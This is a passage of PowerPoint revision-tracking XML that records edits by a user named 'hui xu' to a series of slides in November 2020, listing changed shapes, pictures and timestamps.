          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:17:49.978" v="547" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2945840106" sldId="398"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T11:34:33.443" v="444" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2945840106" sldId="398"/>
            <ac:spMk id="457" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp del mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:51:13.352" v="186" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2588766999" sldId="399"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:37:37.515" v="86" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588766999" sldId="399"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:43:37.418" v="141" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588766999" sldId="399"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:34:55.830" v="72" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588766999" sldId="399"/>
            <ac:spMk id="4" creationId="{9BCF8204-BAD3-7A44-A0C7-A5ADCE68E940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:43:37.418" v="141" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588766999" sldId="399"/>
            <ac:spMk id="6" creationId="{AD56E226-369F-0A45-8DB3-F186B90F1881}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod ord">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:45:04.570" v="552" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2382694460" sldId="400"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:43:29.088" v="140"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2382694460" sldId="400"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:45:04.570" v="552" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2382694460" sldId="400"/>
            <ac:spMk id="5" creationId="{0B022BFF-6E00-4543-A931-0FD60025AF89}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T11:40:47.572" v="496" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2382694460" sldId="400"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:47:09.867" v="598" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2168906294" sldId="401"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:47:09.867" v="598" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2168906294" sldId="401"/>
            <ac:spMk id="5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09:39.471" v="751" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2619828533" sldId="402"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:09:39.471" v="751" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2619828533" sldId="402"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:14:19.888" v="863" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3556185495" sldId="404"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:14:04.330" v="858" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3556185495" sldId="404"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:14:19.888" v="863" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3556185495" sldId="404"/>
            <ac:spMk id="4" creationId="{EDB37C45-25A9-D048-969E-0571BDB86F25}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp del mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:14:25.209" v="864" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="256457774" sldId="405"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:12:57.803" v="843" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="256457774" sldId="405"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:53:02.499" v="621" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="375311883" sldId="406"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T06:25:26.994" v="65" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="375311883" sldId="406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3:53:02.499" v="621" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="375311883" sldId="406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3:50:24.427" v="614" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1282996514" sldId="407"/>
        </pc:sldMkLst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7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8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0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1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2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3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4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5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:50:24.427" v="614" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1282996514" sldId="407"/>
            <ac:spMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:50:24.427" v="614" actId="1035"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1282996514" sldId="407"/>
            <ac:graphicFrameMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:50:24.427" v="614" actId="1035"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1282996514" sldId="407"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:54:54.552" v="634" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1353242536" sldId="409"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:54:49.831" v="630" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1353242536" sldId="409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3:54:54.552" v="634" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1353242536" sldId="409"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:01:53.139" v="241" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1353242536" sldId="409"/>
            <ac:spMk id="9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12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14" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:50:50.698" v="617" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1353242536" sldId="409"/>
            <ac:spMk id="24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30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33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34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42" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:51:12.106" v="618" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1353242536" sldId="409"/>
            <ac:spMk id="47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3:58:14.300" v="673" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3645108053" sldId="410"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T13:55:25.555" v="661" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3645108053" sldId="410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3:58:14.300" v="673" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3645108053" sldId="410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01:22.549" v="675" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1667883124" sldId="412"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:01:22.549" v="675" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667883124" sldId="412"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:04:10.879" v="724" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2518280929" sldId="413"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:02:53.063" v="691" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518280929" sldId="413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4:04:10.879" v="724" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2518280929" sldId="413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06:05.626" v="747" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="182487657" sldId="414"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:06:05.626" v="747" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="182487657" sldId="414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07:22.105" v="750" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3708416017" sldId="415"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:07:22.105" v="750" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3708416017" sldId="415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3:24.971" v="1482" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1761155527" sldId="422"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:33:24.971" v="1482" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1761155527" sldId="422"/>
            <ac:spMk id="5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28:31.619" v="994" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4007006903" sldId="423"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:28:31.619" v="994" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4007006903" sldId="423"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod ord">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:36:33.140" v="1212" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="382758063" sldId="428"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:26:34.803" v="922" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="382758063" sldId="428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4:36:33.140" v="1212" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="382758063" sldId="428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18:46.921" v="890" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4129882780" sldId="429"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:18:46.921" v="890" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4129882780" sldId="429"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:18:28.955" v="889" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4129882780" sldId="429"/>
            <ac:spMk id="4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7:08:30.688" v="273" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3309234802" sldId="432"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-17T07:08:06.249" v="265" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3309234802" sldId="432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17T07:08:30.688" v="273" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3309234802" sldId="432"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:15:23.673" v="886"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4279693017" sldId="434"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:15:23.673" v="886"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4279693017" sldId="434"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:15:52.997" v="888" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="589844686" sldId="439"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:37:05.885" v="1233" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3619072961" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:37:05.885" v="1233" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3619072961" sldId="442"/>
            <ac:spMk id="4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38:08.996" v="1250" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3084460777" sldId="445"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:38:05.666" v="1235" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445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27T14:38:05.666" v="1235" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445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27T14:38:05.666" v="1235" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445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27T14:38:05.666" v="1235" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:38:08.996" v="1250" actId="1037"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445"/>
            <ac:grpSpMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:38:08.996" v="1250" actId="1037"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3084460777" sldId="445"/>
            <ac:grpSpMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:41:57.461" v="1268" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3265957659" sldId="446"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:41:26.720" v="1267" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265957659" sldId="446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4:41:57.461" v="1268" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3265957659" sldId="446"/>
            <ac:spMk id="3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43:57.365" v="1330" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3316231030" sldId="447"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:43:57.365" v="1330" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3316231030" sldId="447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46:42.027" v="1458" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3638114311" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:46:42.027" v="1458" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3638114311" sldId="448"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:45:13.075" v="1358" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3638114311" sldId="448"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:44:21.634" v="1334" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3638114311" sldId="448"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:44:21.634" v="1334" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3638114311" sldId="448"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:44:41.623" v="1351" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3638114311" sldId="448"/>
            <ac:spMk id="11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47:44.056" v="1466" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1416605535" sldId="449"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:47:44.056" v="1466" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1416605535" sldId="449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7:09.548" v="1514" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4003362850" sldId="451"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:37:09.548" v="1514" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4003362850" sldId="451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4:48:06.589" v="1480" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504952864" sldId="452"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T14:48:06.589" v="1480" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504952864" sldId="452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6:24.409" v="1488" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3505286403" sldId="455"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="hui xu" userId="70b675938bab3b5e" providerId="LiveId" clId="{D7FE1FDB-ABDE-9247-BE23-8282125D710F}" dt="2020-11-27T15:36:24.409" v="1488" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3505286403" sldId="455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27T15:35:02.761" v="1487" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3505286403" sldId="455"/>
            <ac:spMk id="9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9:00.241" v="1540" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
